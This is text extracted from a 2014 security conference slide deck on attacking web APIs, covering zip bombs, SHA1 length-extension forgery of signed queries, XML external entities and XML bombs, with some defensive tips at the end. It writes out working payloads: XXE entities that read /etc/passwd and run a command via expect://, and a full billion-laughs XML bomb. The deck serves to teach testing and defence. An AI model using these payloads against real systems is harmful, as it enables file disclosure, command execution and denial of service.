Documente Academic
Documente Profesional
Documente Cultură
Sergey Belov
$ whoami
API
API
ZIP
© 2002—2014, Digital Security 14
Hacking via API
42 Kb…
42 Kb…
…10 Gb?
42 Kb…
…10 Gb?
…100 Gb?
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
Say
HELLO
to
© 2002—2014, Digital Security
ZIP BOMB! 20
Hacking via API
http://habrahabr.ru/post/186160/
© 2002—2014, Digital Security 24
Hacking via API
Crypto
© 2002—2014, Digital Security 25
Hacking via API
Query signing
Sign = sha*(…+DATA+…)
APIkey 26
© 2002—2014, Digital Security
Hacking via API
But why?
© 2002—2014, Digital Security 28
Hacking via API
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
A=1&B=2&C=3\x80\x00\x00…\x02&C=4
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
© 2002—2014, Digital Security 35
Hacking via API
Request hijacking…
How?
DTD Example:
XML example:
<author>&writer;©right;</author>
XML entities?
External Entity!
© 2002—2014, Digital Security 47
Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>
© 2002—2014, Digital Security 48
Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
“expect://id" >]>
<foo>&xxe;</foo>
© 2002—2014, Digital Security 49
Hacking via API
XML Bombs!
© 2002—2014, Digital Security 50
Hacking via API
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>
© 2002—2014, Digital Security 51
What are we talking about?
Examples?
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
© 2002—2014, Digital Security 55
Hacking via API
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
© 2002—2014, Digital Security 57
Hacking via API